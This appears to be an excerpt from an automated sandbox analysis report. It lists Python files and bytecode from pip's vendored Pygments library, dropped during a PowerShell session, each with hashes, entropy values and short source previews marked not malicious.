                              File Type:Python script, Unicode text, UTF-8 text executable
                              Category:dropped
                              Size (bytes):23685
                              Entropy (8bit):4.340463405573033
                              Encrypted:false
                              SSDEEP:384:iJqsoXfnnzl4Z0TSEjXNnocCVPbloBSYdqbazFd7j:iJqdnnzl4ZISoocCVPZoBSYdjzD7j
                              MD5:06DD41C17DFB35881CE4E23C30534863
                              SHA1:375F2C67E11155E43CD3C847DFA0F47E10F9F449
                              SHA-256:6F2C58269F609E355ECA1465677513320A3F2E191787569FBCDF30241B4071CF
                              SHA-512:2F9EA61F311437DEE840E7CE10C3EAFDAD68D9D0A1DB2FB2EAFFC2B81ABA24A4931045A7BCA3CE71C84F9ABF817B83D713A1B9671D91EC33D29C1B7692263930
                              Malicious:false
                              Preview:""". pygments.cmdline. ~~~~~~~~~~~~~~~~.. Command line interface... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.."""..import os.import sys.import shutil.import argparse.from textwrap import dedent..from pip._vendor.pygments import __version__, highlight.from pip._vendor.pygments.util import ClassNotFound, OptionError, docstring_headline, \. guess_decode, guess_decode_from_terminal, terminal_encoding, \. UnclosingTextIOWrapper.from pip._vendor.pygments.lexers import get_all_lexers, get_lexer_by_name, guess_lexer, \. load_lexer_from_file, get_lexer_for_filename, find_lexer_class_for_filename.from pip._vendor.pygments.lexers.special import TextLexer.from pip._vendor.pygments.formatters.latex import LatexEmbeddedLexer, LatexFormatter.from pip._vendor.pygments.formatters import get_all_formatters, get_formatter_by_name, \. load_formatter_from_file, get_formatter_for_filename, find_formatter_class.from
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):1697
                              Entropy (8bit):4.779934860652409
                              Encrypted:false
                              SSDEEP:48:YlGG1dsgllfLnfvZCofuIih1XXkabBZAGFkvJkbZ/gulgY:YkgyglljfBCquIU1XXpq24uCY
                              MD5:450B87DD5878B793336B090297EC6309
                              SHA1:8630C1C81F6D8B641F7C3711441EDD186B0B1657
                              SHA-256:DB06795BE53A4EE7490F5FCD2D4C237253296E898533DD6536FD75FFAD2C7C66
                              SHA-512:BE126F818E4F2B1639D8F55C30B245A82D8BED28E71FC79D48A513E65F6A5AE5C3F86C147E30B82140C1E2E5461BDA07B8B978E8F89A889096E46E8C8255AD5B
                              Malicious:false
                              Preview:""". pygments.console. ~~~~~~~~~~~~~~~~.. Format colored console output... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.."""..esc = "\x1b["..codes = {}.codes[""] = "".codes["reset"] = esc + "39;49;00m"..codes["bold"] = esc + "01m".codes["faint"] = esc + "02m".codes["standout"] = esc + "03m".codes["underline"] = esc + "04m".codes["blink"] = esc + "05m".codes["overline"] = esc + "06m"..dark_colors = ["black", "red", "green", "yellow", "blue",. "magenta", "cyan", "gray"].light_colors = ["brightblack", "brightred", "brightgreen", "brightyellow", "brightblue",. "brightmagenta", "brightcyan", "white"]..x = 30.for d, l in zip(dark_colors, light_colors):. codes[d] = esc + "%im" % x. codes[l] = esc + "%im" % (60 + x). x += 1..del d, l, x..codes["white"] = codes["bold"]...def reset_color():. return codes["reset"]...def colorize(color_key, text):. return codes[color_key] + text
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):1938
                              Entropy (8bit):4.488825294219764
                              Encrypted:false
                              SSDEEP:48:YaSGaQSjtuBmyy0TLLy09/jxOQUX+ibnM8abOS2DowxWw5Ro:YaS5QSRugyzHLy09/jBlibM8A3wU
                              MD5:B9D28DC447A3D3AB9116636D683039A5
                              SHA1:87FEDEAF657DD9DC7C191B1C3C9461B59514239D
                              SHA-256:8F968B33D6BDC12C7A787D68CB8EF7A12909D3684658DA6D065568E2CD60FF7D
                              SHA-512:DEEAFC1AD7D38F93EBBC06838E758390D1550A048052E59A5A5AB65096D7C45E2AE073BFDA6F0132626EC319902E4AAE375B90C71AB568EBED182BBFE9189196
                              Malicious:false
                              Preview:""". pygments.filter. ~~~~~~~~~~~~~~~.. Module that implements the default filter... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.."""...def apply_filters(stream, filters, lexer=None):. """. Use this method to apply an iterable of filters to. a stream. If lexer is given it's forwarded to the. filter, otherwise the filter receives `None`.. """. def _apply(filter_, stream):. yield from filter_.filter(lexer, stream). for filter_ in filters:. stream = _apply(filter_, stream). return stream...def simplefilter(f):. """. Decorator that converts a function into a filter::.. @simplefilter. def lowercase(self, lexer, stream, options):. for ttype, value in stream:. yield ttype, value.lower(). """. return type(f.__name__, (FunctionFilter,), {. '__module__': getattr(f, '__module__'),. '__doc__': f.__doc__,. 'funct
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, Unicode text, UTF-8 text executable
                              Category:dropped
                              Size (bytes):40386
                              Entropy (8bit):3.934104313489659
                              Encrypted:false
                              SSDEEP:384:qCFI4li9kb1xljrGSV+vjecMcyZb77zQIB39yMR8nEzNXeA++QNecS4tOKBYnV:qCF5DjEvfWtIR0KmV
                              MD5:CB08F0D464B3AFAD4348A007FCD2583E
                              SHA1:C166F4460E3DA0CEA2FFE9F54CBDE12801EE53F6
                              SHA-256:87F928624505A3E1455318ECE7AE091D4033ECEDF226957023A7CA377318CC6D
                              SHA-512:6D76C1A33D2838A38ED5CA188F5E1ADCE7FE03C5EA7FFEBE9653B0D352725AB1E5D9EBA71CC1B68104E8BDD1EEF47D79D52E9F76CC99DA0BDD68AA35D545887A
                              Malicious:false
                              Preview:""". pygments.filters. ~~~~~~~~~~~~~~~~.. Module containing filter lookup functions and default. filters... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.."""..import re..from pip._vendor.pygments.token import String, Comment, Keyword, Name, Error, Whitespace, \. string_to_tokentype.from pip._vendor.pygments.filter import Filter.from pip._vendor.pygments.util import get_list_opt, get_int_opt, get_bool_opt, \. get_choice_opt, ClassNotFound, OptionError.from pip._vendor.pygments.plugin import find_plugin_filters...def find_filter_class(filtername):. """Lookup a filter by name. Return None if not found.""". if filtername in FILTERS:. return FILTERS[filtername]. for name, cls in find_plugin_filters():. if name == filtername:. return cls. return None...def get_filter_by_name(filtername, **options):. """Return an instantiated filter... Options are passed to the filt
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):37947
                              Entropy (8bit):6.103019866133882
                              Encrypted:false
                              SSDEEP:768:mPox+b28PUaojniUBbf06K+P7VozxFRpYy1YKJ0D:mPosd8aorRD0z+P7VIFR6y1zi
                              MD5:426DE002E82E273C5E13459E29A6639B
                              SHA1:F09DD8CCBEB0D589B55DCF302D27864D1965683F
                              SHA-256:68C8A53BB5E30CD58E320CC86DAFCAD0BFD45DA34A2259A22F5C27FA0A2884DE
                              SHA-512:1673458DE67FE4D4824346F299CF815E251327F9D80D1A8FF5FA0CE2F5E187594D1F50D5EC438CCF06159982460E0F92D7AA4B929F4DF094CFCA7A3E82B191C0
                              Malicious:false
                              Preview:........=.Cf.........................f.....d.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d...Z.d...Z.d...Z.d...f.d...Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z ..G.d...d.e.........Z!..G.d...d.e.........Z"e.e.e.e.e e!e"e.d...Z#y.).z.. pygments.filters. ~~~~~~~~~~~~~~~~.. Module containing filter lookup functions and default. filters... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.......N)...String..Comment..Keyword..Name..Error..Whitespace..string_to_tokentype)...Filter)...get_list_opt..get_int_opt..get_bool_opt..get_choice_opt..ClassNotFound..OptionError)...find_plugin_filtersc.....................\.....|.t.........v.r.t.........|.....S.t.................D.]...\...}.}.|.|.k(..s...|.c...S...y.).z2Lookup a filter by name. Return None if not
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):4178
                              Entropy (8bit):4.486813538347638
                              Encrypted:false
                              SSDEEP:96:YpHGIEg/jcBmgwGvCt798i2m7DtfC9ykwMWleXyQBD:87w88i2Etf5NKy2
                              MD5:3F62A4A5E7ABBF52681F7B46CC465322
                              SHA1:2FF27F2B5A03AD1018882E6303BF8BF39CEFB6B6
                              SHA-256:27D38BF615CB24A664EE6A1480AC298D6F4735FE16949160FE8FFE67F4BFB536
                              SHA-512:C8CABE60100DBBDF22B0A172CE02FDBC01FED3354C363627001528086E98F4DA23040A9107EB95330EC759ED8CDDE8EE0F316A70BAF45CAC344BF6A9E5611B27
                              Malicious:false
                              Preview:""". pygments.formatter. ~~~~~~~~~~~~~~~~~~.. Base formatter class... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.."""..import codecs..from pip._vendor.pygments.util import get_bool_opt.from pip._vendor.pygments.styles import get_style_by_name..__all__ = ['Formatter']...def _lookup_style(style):. if isinstance(style, str):. return get_style_by_name(style). return style...class Formatter:. """. Converts a token stream to text... Formatters should have attributes to help selecting them. These. are similar to the corresponding :class:`~pygments.lexer.Lexer`. attributes... .. autoattribute:: name. :no-value:.. .. autoattribute:: aliases. :no-value:.. .. autoattribute:: filenames. :no-value:.. You can pass options as keyword arguments to the constructor.. All formatters accept these basic options:.. ``style``. The style to use, can be a string
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):5424
                              Entropy (8bit):4.59109295075211
                              Encrypted:false
                              SSDEEP:96:YBfHDbvQt81zSRZk1pHl88YSuLLd+BFX/f9gIEd0zKmmd+ueISQZwTNu:2ZzSRy3FySA+FvamCSXu
                              MD5:64EB306A20C0A8FC578C8680565823D1
                              SHA1:15ADB89D224CA7E4D293CFF1AE2C6B0B29C7C198
                              SHA-256:FF180071D14AAF440D63087F8BDF0053D86F7CFDD7DB0024844945711445DD4A
                              SHA-512:4E36DB75BEC47E857227414F96FB7DE281626839AAD2F5581666E447E46629CCC3710506566FC721C31CDDCCEC1484045230AAE89984B293D04DDA1CC4EDB599
                              Malicious:false
                              Preview:""". pygments.formatters. ~~~~~~~~~~~~~~~~~~~.. Pygments formatters... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.."""..import re.import sys.import types.import fnmatch.from os.path import basename..from pip._vendor.pygments.formatters._mapping import FORMATTERS.from pip._vendor.pygments.plugin import find_plugin_formatters.from pip._vendor.pygments.util import ClassNotFound..__all__ = ['get_formatter_by_name', 'get_formatter_for_filename',. 'get_all_formatters', 'load_formatter_from_file'] + list(FORMATTERS).._formatter_cache = {} # classes by name._pattern_cache = {}...def _fn_matches(fn, glob):. """Return whether the supplied file name fn matches pattern filename.""". if glob not in _pattern_cache:. pattern = _pattern_cache[glob] = re.compile(fnmatch.translate(glob)). return pattern.match(fn). return _pattern_cache[glob].match(fn)...def _load_formatters(module_name):.
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):6937
                              Entropy (8bit):5.524165383214288
                              Encrypted:false
                              SSDEEP:96:sd0rBfNaf8m7+okhfOtIKJ1mIPYsMbAA0LLd+B0G47JnU9gIEd0KzQ7T2QkNEmmj:y8myqtZoXtW+qJnDM7T2bN3CaOw+
                              MD5:1BDDAD084BCA154CC2648F7A7363D846
                              SHA1:A0FA48089FD83382ED6C6E2CCFCB0051159AB53C
                              SHA-256:FD87BC3F5331B110F995C12318A46AE5D363EBB5BC78E5F2C47D7F1FC53A03DA
                              SHA-512:A0CA2F5F80339D1F86DC8934B7C6A5711CDD38F6300AB4CC235B6F1838E253D025AE8BF7BF7425E53052E390DEAE204FC30302FD3C116467BDDF867D0EE7E7B9
                              Malicious:false
                              Preview:........=.Cf0.........................v.....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...g.d.....e.e.........z...Z.i.Z.i.Z.d...Z.d...Z.d...Z.d...Z.d...Z.d.d...Z.d...Z...G.d...d.e.j0..........................Z.e.j4..................e.....Z...e.e.........Z.e.j<..................j?..................e.j<............................e.e.j4..................e.<...e.`.e.`.e.`.e.`.y.).z.. pygments.formatters. ~~~~~~~~~~~~~~~~~~~.. Pygments formatters... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.......N)...basename)...FORMATTERS)...find_plugin_formatters)...ClassNotFound)...get_formatter_by_name..get_formatter_for_filename..get_all_formatters..load_formatter_from_filec...........................|.t.........v.rBt.........j...................t.........j...................|.................x.}.t.........|.<...|.j...................|.........S.t.........|.....j...................|..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):4226
                              Entropy (8bit):5.4522149107056705
                              Encrypted:false
                              SSDEEP:96:7dCj0uAjP5CsEGJVd5rdhOsq56zLr8X3VZJKXXSt+F8OPt:0yfHgTmFFdPt
                              MD5:D4F209313ADD0DD74910809C705BDCA1
                              SHA1:F458D6E5419CE1990E91AA3422339189CEDC2551
                              SHA-256:3D7A18A1A25E563CB57A209F6D158CBE5A4F81D5333436FE3242275D82DE0FA7
                              SHA-512:9634CEDA6A3DF16223C6ABC533A7F6B8F5FA0B5ADD670F8A92A57F45BEB037DA531AD95D916DB475C934D3558CA77CF507B09A1C96782481B060E7AEA7FE2AA8
                              Malicious:false
                              Preview:........=.CfP.........................v.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d d!..d"d#i...Z.y$)%..BBCodeFormatter).z.pygments.formatters.bbcode..BBCode)...bbcode..bb..z.Format tokens with BBcodes. These formatting codes are used by many bulletin boards, so you can highlight your sourcecode with pygments before posting it there...BmpImageFormatter)...pygments.formatters.img..img_bmp)...bmp..bitmap).z.*.bmpzwCreate a bitmap image from source code. This uses the Python Imaging Library to generate a pixmap from the source code...GifImageFormatter).r......img_gif)...gif).z.*.gifztCreate a GIF image from source code. This uses the Python Imaging Library to generate a pixmap from the source code...GroffFormatter).z.pygments.formatters.groff..groff).r......troff..roffr....zFFormat tokens with groff escapes to change their color and font style...HtmlFormatter).z.pygments.formatters.html..HTML)...html).z.*.htmlz.*.htmz.Format toke
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):4205
                              Entropy (8bit):5.578203261042943
                              Encrypted:false
                              SSDEEP:96:IhxSRvak0bBcWT+pHt3kQ7RbUqqlHIpv9Oo8CQ:hakMBcWKz3whKVO8Q
                              MD5:B88F13B40746BBE3705F4E3D9AD0D71E
                              SHA1:EB0A3AE8BE07460A1DAD5092B6791E961FC87848
                              SHA-256:A4F152815B20E65A04CDAD047DCD3138EA58E2EB65B0D456CAFE548B1BEED630
                              SHA-512:B156F2E0B487E540095402AA41826E76BE294345AC92907F0F41A367A163CAE3039BAE15D371EE70D4A59B70C5230258E507B64AE3212CA8CD10B1F8E98E3CAC
                              Malicious:false
                              Preview:........=.Cf..........................<.....d.Z.d.d.l.m.Z...d.d.l.m.Z...d.g.Z...G.d...d.e.........Z.y.).z.. pygments.formatters.bbcode. ~~~~~~~~~~~~~~~~~~~~~~~~~~.. BBcode formatter... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.......)...Formatter)...get_bool_opt..BBCodeFormatterc.....................2.....e.Z.d.Z.d.Z.d.Z.d.d.g.Z.g.Z.d...Z.d...Z.d...Z.y.).r....a..... Format tokens with BBcodes. These formatting codes are used by many. bulletin boards, so you can highlight your sourcecode with pygments before. posting it there... This formatter has no support for background colors and borders, as there. are no common BBcode tags for that... Some board systems (e.g. phpBB) don't support colors in their [code] tag,. so you can't use the highlighting together with that tag.. Text in a [code] tag usually is shown with a monospace font (which this. formatter can do with the ``monofont``
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):7275
                              Entropy (8bit):5.376463514500946
                              Encrypted:false
                              SSDEEP:96:yahj6bB18eu+BFvxHZ2gvSxO0bjFHRkNN1sVV2lNRv3W/VCI4VzXf1GYwB6o9O5d:yEmB1//BF5ogK00bd7R4VzXfKB6+O5d
                              MD5:A04D0681E7551F622A436346DC3D7D1B
                              SHA1:BC7DE733F44025554F076E377F6B85B03A802146
                              SHA-256:3FE5D84C0C3D7D9299BCE07C654508F2212D145F4E14BED22CF14803944F2639
                              SHA-512:A40D7500D5D243DFBA2DE8B70B351397F1585C34A505D7472CC46A96DC18BB5424C9271A4E2F2DE30AB5590FBAF6F1CE5E780D055464D6557BA429F32489DABD
                              Malicious:false
                              Preview:........=.Cf..........................H.....d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.g.Z...G.d...d.e.........Z.y.).z.. pygments.formatters.groff. ~~~~~~~~~~~~~~~~~~~~~~~~~.. Formatter for groff output... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.......N)...Formatter)...get_bool_opt..get_int_opt..GroffFormatterc.....................J.....e.Z.d.Z.d.Z.d.Z.g.d...Z.g.Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.y.).r....a..... Format tokens with groff escapes to change their color and font style... .. versionadded:: 2.11.. Additional options accepted:.. `style`. The style to use, can be a string or a Style subclass (default:. ``'default'``)... `monospaced`. If set to true, monospace font will be used (default: ``true``)... `linenos`. If set to true, print the line numbers (default: ``false``)... `wrap`. Wrap lines to the specified number of characters. Disa
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):40583
                              Entropy (8bit):5.603253973790322
                              Encrypted:false
                              SSDEEP:768:2f5FhEEBGxIFiME72GTonhrlVuPaOF0D8EHg3YaovU/gwUvPlOfvGzjfV29dvqGj:ahp0Iiz2/nhCaIV3/oecyqG64
                              MD5:6E9341A55E19D946BEEF6339D409C0B7
                              SHA1:C2826DF959F37CDD77677F0B507B8ECF5B2CBFA3
                              SHA-256:796A4F38D5AEAE0747EBBC88F4D773D2A48C59924173E5A7F6581271408B3D36
                              SHA-512:FFB8EA1F60CF38CFC4A79443A595F5971D04F52848D23D04A691A7D1B474B7BCF702D4DA5633291ADB53DB67CDF20DC10A47DF72C43B0FA3F65529488DB714E3
                              Malicious:false
                              Preview:........=.Cf................................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.....d.d.l.Z.d.g.Z...e.d.........d...e.d.........d...e.d.........d...e.d.........d...e.d.........d.i.Z.e.f.d...Z.d...Z.d...Z.d.Z.d.e.z...d.z...Z.d.Z.d.Z...G.d...d.e.........Z.y.#.e.$.r...d.Z.Y..[w.x.Y.w.).z.. pygments.formatters.html. ~~~~~~~~~~~~~~~~~~~~~~~~.. Formatter for HTML output... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.......N)...StringIO)...Formatter)...Token..Text..STANDARD_TYPES)...get_bool_opt..get_int_opt..get_list_opt..HtmlFormatter..&z.&amp;..<z.&lt;..>z.&gt;.."z.&quot;..'z.&#39;c.....................$.....|.j...................|.........S.).z<Escape &, <, > as well as single and double quotes for HTML.)...translate)...text..tables.... .pC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_vendor/pygments/formatters/html.py.
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):27054
                              Entropy (8bit):5.368295559597716
                              Encrypted:false
                              SSDEEP:768:DiWDVW1jqsbTTFr25tzbypikv68RqoALWm:z49qexCOFBqoAim
                              MD5:195C76416EEA4E169F5A322E77E6A859
                              SHA1:DCBB72A2BF9F5C3B902DCB86BDB9955B95F01436
                              SHA-256:FBA2DC62F0644A7BE74211278CFBD1802DC65B39898E1EDD8494B3A73E358F6D
                              SHA-512:85C7319B8D55BB59D6967DC7031A6EFA29DE2551B91FAC52102D19D80E5C4950307BE92F61B243843C3562FE6E5492DF88305B39ADFA45A7803CE17125F01DC2
                              Malicious:false
                              Preview:........=.Cf.U.............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.Z...d.d.l.m.Z.m.Z.m.Z...d.Z...d.d.l.Z.g.d...Z.g.d...d.d.g.d.g.d.d.g.d...Z.d.Z.d.Z.d.Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d e.........Z.y.#.e.$.r...d.Z.Y..sw.x.Y.w.#.e.$.r.....d.d.l.Z.n.#.e.$.r...d.Z.Y.n.w.x.Y.w.Y...w.x.Y.w.)!z.. pygments.formatters.img. ~~~~~~~~~~~~~~~~~~~~~~~.. Formatter for Pixmap output... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.......N)...Formatter)...get_bool_opt..get_int_opt..get_list_opt..get_choice_opt)...Image..ImageDraw..ImageFontTF)...ImageFormatter..GifImageFormatter..JpgImageFormatter..BmpImageFormatter).....Roman..Book..Normal..Regular..Medium..Oblique..Italic..Boldz.Bold Obliquez.Bold Italic)...NORMAL..ITALIC..BOLD..BOLDITALICz.DejaVu Sans Monoz.Courier New..Menloc....
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):6076
                              Entropy (8bit):5.626337188338668
                              Encrypted:false
                              SSDEEP:96:Rx2XvFaQMcJCrlleCzxGW+39K+vG/c38lanaJr49v9Ok+kz/XLy+4OEOdNve0cl:Rxm7k8o+39K+u/dcaJM9VOe/+BOr2Jl
                              MD5:2D900A810F79A11D702DE4547BA73377
                              SHA1:699834D930523033A35092327061697025F2EB2C
                              SHA-256:C507DDFF49F71063DB4ABCBE08F2B2445977E744B37DEE8A40FA0E04B4580B95
                              SHA-512:7253B6776B2176C73A778665D1638C2DAB89CF3F6CC4FF854BB0E08A6720E6D86433C8EABF4F1198AA53804DDD65922BC0EC0DA3A147A724BBBF0905E142D825
                              Malicious:false
                              Preview:........=.Cfu...............................d.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.g.Z.i.e.d...e.d...e.d...e.j"..................d...e.d...e.j$..................d...e.j&..................d...e.j(..................d...e.j*..................d...e.j,..................d...e.j...................d...e.j0..................d...e.j2..................d...e.j4..................d...e.j6..................d...e.j8..................d...e.j:..................d...e.d.e.d.e.j<..................d.e.j>..................d.e.j@..................d.e.jB..................d.e.j...................d.e.d.i...Z"i.d.d...d.d...d.d...d.d...d.d...d.d ..d!d"..d#d$..d%d$..d&d'..d(d)..d*d)..d+d,..d-d...d/d...d0d1..d2d3..d4d5d.....Z#d6..Z$..G.d7..d.e.........Z%y8)9z.. pygments.formatters.irc. ~~~~~~~~~~~~~~~~~~~~~~~.. Formatter for IRC output.. :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.......)...Formatter)
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):19965
                              Entropy (8bit):5.670901284929988
                              Encrypted:false
                              SSDEEP:384:w44YYRRO4YF/oB/ltm2QDDCNA0DhGmD0aJxTQRhB8jqdX800sLeinPtfT:eO4AoBNgDWNA0HIafQRz8jqdj0VinPt7
                              MD5:5AFB38C49F1BB7EDD96BEBD85AA488C5
                              SHA1:ADEFAD8FD255CD66DF5BB238B40EE7CA8CD1EE9D
                              SHA-256:42C99AF5D90FFB06B0B3C09677F8BF25C87441720F58F22EDAC98A22A8A5DD31
                              SHA-512:6CF01AEB5C49BA67DFBC74B8EBAE92533B678E64FAE49A0DC980B62B5219AC4A1FBAC51ECCAB9FBEAFA389082A96D8DAAB9F299E309A0DDE4C398BFA9F1C1D58
                              Malicious:false
                              Preview:........=.Cf.K.............................d.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.g.Z.d...Z.d.Z.d.Z.d...Z...G.d...d.e.........Z...G.d...d.e.........Z.y.).z.. pygments.formatters.latex. ~~~~~~~~~~~~~~~~~~~~~~~~~.. Formatter for LaTeX fancyvrb output... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.......)...StringIO)...Formatter)...Lexer..do_insertions)...Token..STANDARD_TYPES)...get_bool_opt..get_int_opt..LatexFormatterc..........................|.j...................d.d.........j...................d.d.........j...................d.d.........j...................d.d.|.z...........j...................d.d.|.z...........j...................d.d.|.z...........j...................d.d.|.z...........j...................d.d.|.z...........j...................d.d.|.z...........j...................d.d.|.z...........j...................d.d.|.z...........j...................d.d.|.z....
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):6895
                              Entropy (8bit):5.407219820629323
                              Encrypted:false
                              SSDEEP:192:4gcIysUOJ3M14OxB2VWVAWj3smmqvDg7yu:4gcIfUMEXxYVWVAWDmqvc7yu
                              MD5:2B63DEDC4670BFA61CB07658130E9EBF
                              SHA1:418A43ABADE8CEE8079F00A33840781D964F2161
                              SHA-256:899526B7EBC930804395A79DA75AE285A3C9A81BDB21304229C10499D258275A
                              SHA-512:611CF5219F05463872B91DB43EBF19A634056334B210F8131BDD6CA6B8150250683A2EBD5D091C2EB8EFCE3264AE4BD73D01FC3BE1CBA18996E3C2FAF9AB0A53
                              Malicious:false
                              Preview:........=.Cf...............................d.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...g.d...Z...G.d...d.e.........Z...G.d...d.e.........Z.d.Z.d.Z...G.d...d.e.........Z.y.).z.. pygments.formatters.other. ~~~~~~~~~~~~~~~~~~~~~~~~~.. Other formatters: NullFormatter, RawTokenFormatter... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.......)...Formatter)...get_choice_opt)...Token)...colorize)...NullFormatter..RawTokenFormatter..TestcaseFormatterc.....................(.....e.Z.d.Z.d.Z.d.Z.d.d.g.Z.d.g.Z.d...Z.y.).r....z;. Output the text unchanged without any formatting.. z.Text only..text..nullz.*.txtc..........................|.j...................}.|.D.]9..\...}.}.|.r!|.j...................|.j...................|....................)|.j...................|............;..y...N)...encoding..write..encode)...self..tokensource..outfile..enc..ttype..values.... .qC:\Users\boadi\AppData\Local\Program
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):2941
                              Entropy (8bit):5.73040802598811
                              Encrypted:false
                              SSDEEP:48:TYa8WGtP+55h7q/DfoBHFop0+5N6/u80849rK9P0b4Y+9I:LdM+xqcfw5Nn249O9P0b4DI
                              MD5:D19B56A0C954F43C2341671A994657D9
                              SHA1:F82B419FC00BA8308D19BE24B81CACB8FA8DC37C
                              SHA-256:B0C0C02B3E3AA4A087A6F3D059760B790B3767A466BD2DD5A3298288FBADEAE9
                              SHA-512:19920AE01219FC415F1B95FF127EBA41C7AFA00D53550E955D0CAD2A52349E6029C5ED41E2DE1618679AB91A0C581785019F74EF86441655C29D57B1E3B620EB
                              Malicious:false
                              Preview:........=.Cf..........................^.....d.Z.d.d.l.m.Z...d.g.Z...e.d.........d...e.d.........d.i.Z.e.f.d...Z...G.d...d.e.........Z.y.).z.. pygments.formatters.pangomarkup. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~.. Formatter for Pango markup output... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.......)...Formatter..PangoMarkupFormatter..&z.&amp;..<z.&lt;c.....................$.....|.j...................|.........S.).z Escape & and < for Pango Markup.)...translate)...text..tables.... .wC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_vendor/pygments/formatters/pangomarkup.py..escape_special_charsr........s..........>.>.%.. .. .....c.....................,.....e.Z.d.Z.d.Z.d.Z.d.d.g.Z.g.Z.d...Z.d...Z.y.).r....zk. Format tokens as Pango Markup code. It can then be rendered to an SVG... .. versionadded:: 2.9. z.Pango Markup..pango..pangomarkupc...........................t.........j.
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):6137
                              Entropy (8bit):5.51340915179446
                              Encrypted:false
                              SSDEEP:96:BEFFytmsO7DspbB2lya6jIk+IS7KgIvsRusJDJwNtwXxdO4Who+49Oy8B:BEupO7IBB27YIJISegIvs1XO45OZ
                              MD5:390FFE943C886B4DBDC0EA900BC3BB37
